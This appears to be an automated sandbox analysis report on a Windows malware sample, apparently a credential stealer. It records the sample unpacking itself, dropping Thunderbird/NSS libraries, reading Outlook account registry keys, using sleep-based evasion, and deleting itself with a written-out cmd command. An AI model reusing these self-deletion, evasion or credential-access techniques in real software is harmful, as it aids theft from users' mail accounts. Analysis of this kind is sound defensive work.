Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, sqlite3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: sqlite3.dll.1.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Mutant created: \Sessions\1\BaseNamedObjects\user5L1M3_noturbusiness
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_01
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.1.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.1.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.1.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.1.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323091495.0000000002DC9000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.1.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.1.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.1.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327457378.000000006E4F9000.00000002.00020000.sdmp, mozglue.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.1.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.1.dr
Source: Binary string: PC:\boguxuram_wizuz\hakekuna.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.1.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy_InUse.dll.1.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.1.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.1.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.1.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327457378.000000006E4F9000.00000002.00020000.sdmp, mozglue.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.1.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.1.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.1.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.1.dr
Source: Binary string: C:\boguxuram_wizuz\hakekuna.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.1.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.1.dr

Data Obfuscation:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Unpacked PE file: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Unpacked PE file: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_004000BB push edx; retf 1_2_004000C2
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_004407F0 push ecx; ret 1_2_00440803
PE file contains sections with non-standard names
Source: sqlite3.dll.1.dr Static PE information: section name: /4
Source: sqlite3.dll.1.dr Static PE information: section name: /19
Source: sqlite3.dll.1.dr Static PE information: section name: /31
Source: sqlite3.dll.1.dr Static PE information: section name: /45
Source: sqlite3.dll.1.dr Static PE information: section name: /57
Source: sqlite3.dll.1.dr Static PE information: section name: /70
Source: sqlite3.dll.1.dr Static PE information: section name: /81
Source: sqlite3.dll.1.dr Static PE information: section name: /92
Source: AccessibleHandler.dll.1.dr Static PE information: section name: .orpc
Source: AccessibleMarshal.dll.1.dr Static PE information: section name: .orpc
Source: IA2Marshal.dll.1.dr Static PE information: section name: .orpc
Source: lgpllibs.dll.1.dr Static PE information: section name: .rodata
Source: MapiProxy.dll.1.dr Static PE information: section name: .orpc
Source: MapiProxy_InUse.dll.1.dr Static PE information: section name: .orpc
Source: mozglue.dll.1.dr Static PE information: section name: .didat
Source: msvcp140.dll.1.dr Static PE information: section name: .didat
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0042A2F9 GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary, 1_2_0042A2F9
Binary contains a suspicious time stamp
Source: ucrtbase.dll.1.dr Static PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]
Source: initial sample Static PE information: section name: .text entropy: 7.9745561755

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ucrtbase.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Self deletion via cmd delete
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe' Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_004206DD __EH_prolog,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_004206DD

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe TID: 6232 Thread sleep time: -90000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 5684 Thread sleep count: 91 > 30 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
